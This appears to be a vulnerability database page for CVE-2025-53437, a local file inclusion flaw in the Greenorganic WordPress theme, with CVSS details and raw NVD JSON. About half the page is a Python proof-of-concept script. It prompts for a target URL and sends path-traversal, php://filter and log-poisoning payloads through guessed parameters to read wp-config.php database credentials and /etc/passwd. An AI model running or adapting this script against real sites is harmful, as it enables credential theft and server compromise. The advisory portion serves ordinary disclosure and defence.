Security Vulnerability Report
中文
CVE-2025-53437 CVSS 8.1 HIGH

CVE-2025-53437

Published: 2025-12-18 08:15:54
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ApusTheme Greenorganic greenorganic allows PHP Local File Inclusion.This issue affects Greenorganic: from n/a through <= 2.45.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Greenorganic <= 2.45

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53437 Greenorganic Theme LFI PoC # Target: WordPress site using Greenorganic theme <= 2.45 import requests import sys TARGET = input("Enter target URL (e.g., http://target.com): ").rstrip('/') # Common vulnerable parameters in WordPress themes VULN_PARAMS = ['file', 'page', 'template', 'action', 'load', 'include'] # Payloads for testing PAYLOADS = [ # Read wp-config.php "../../../wp-config.php", "../../wp-config.php", "../wp-config.php", "wp-config.php", # Base64 encoded read "php://filter/read=convert.base64-encode/resource=../../../wp-config.php", # Read passwd "../../../../../../etc/passwd", # Log poisoning "<?php phpinfo(); ?>", ] def test_lfi(): print(f"[*] Testing LFI vulnerability on {TARGET}") print("[*] Target: Greenorganic theme <= 2.45") # Try common theme paths paths = [ "/wp-content/themes/greenorganic/some-file.php", "/wp-content/themes/greenorganic/functions.php", ] for path in paths: for param in VULN_PARAMS: for payload in PAYLOADS: try: url = f"{TARGET}{path}?{param}={payload}" resp = requests.get(url, timeout=10) # Check for sensitive content if 'DB_NAME' in resp.text or 'DB_PASSWORD' in resp.text: print(f"[+] VULNERABLE! Found config at: {url}") print(f"[+] Content preview: {resp.text[:500]}") return True elif '/etc/passwd' in resp.text and 'root:' in resp.text: print(f"[+] VULNERABLE! Found /etc/passwd at: {url}") return True except Exception as e: print(f"[-] Error testing {url}: {e}") print("[-] No obvious LFI found, manual testing recommended") return False if __name__ == "__main__": test_lfi()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53437", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:54.117", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ApusTheme Greenorganic greenorganic allows PHP Local File Inclusion.This issue affects Greenorganic: from n/a through <= 2.45."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/greenorganic/vulnerability/wordpress-greenorganic-theme-2-45-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}